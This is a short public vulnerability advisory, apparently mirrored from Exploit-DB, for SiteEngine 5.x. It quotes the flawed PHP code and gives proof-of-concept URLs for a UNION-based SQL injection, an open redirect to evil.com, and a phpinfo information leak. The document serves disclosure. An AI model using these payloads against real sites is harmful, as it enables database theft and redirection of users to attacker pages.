Lucene search
Xy7EDB-ID:6823HistoryOct 23, 2008 - 12:00 a.m.
SiteEngine 5.x - Multiple Vulnerabilities
2008-10-2300:00:00
xy7
www.exploit-db.com
25
AI Score
7.4
Confidence
Low
SiteEngine 5.x Multiple Remote Vulnerabilities
Due to incorrect use of intval function, leading to the logic of inspection parameters can be bypassed, resulting in SQL injection vulnerability.
-=0x01=- SQL injection Vulnerability
vul code like this:
if ( intval( $id ) )
{
require_once( $site_engine_root."lib/rss.php" );
$sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";
POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
This vulnerability exist in board.php too……
-=0x02=- URI Redirection Vulnerability
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com
-=0x03=- Information Disclosure Vulnerability
POC:
http://www.test.com/misc.php?action=php_info
ForFun~
-=EOF=-
# milw0rm.com [2008-10-23]Related
cvelist
cvelist
CVE-2008-7267
2010-12-01 16:00:00
prion
prion
Sql injection
2010-12-01 16:06:00
exploitdb
exploitdb
cve
cve
CVE-2008-7267
2010-12-01 16:06:12
nvd
nvd
CVE-2008-7267
2010-12-01 16:06:12